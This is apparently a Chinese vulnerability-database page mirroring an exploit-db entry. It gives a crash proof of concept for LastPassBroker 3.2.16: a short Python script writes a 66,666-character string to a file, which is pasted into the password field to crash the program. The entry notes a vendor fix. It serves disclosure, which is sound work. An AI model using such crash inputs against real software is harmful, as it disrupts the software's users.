Last PassBroker 3.2.16 - Stack Buffer Overflow (PoC)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1066480 漏洞类型
发布时间 2015-10-06 更新时间 2015-10-06
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/38405
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
'''
********************************************************************************************
# Exploit Title: Last PassBroker Stack-based BOF
# Date: 9/23/2015
# Exploit Author: Un_N0n
# Software Link: https://lastpass.com/download
# Version: 3.2.16
# Tested on: Windows 7 x86(32 BIT)
********************************************************************************************

[Steps to Produce the Crash]:
1- open 'LastPassBroker.exe'.
2- A Input-Box will appear asking for Email and Password,
   In password field paste in the contents of crash.txt
3- Hit Login.
~Software will Crash.

[Code to produce crash.txt]: 
'''
junk = "A"*66666
file = open("CRASH.txt",'w')
file.write(junk)
file.close()

'''
> Vendor Notified, Fixed in latest Release.
**********************************************************************************************
'''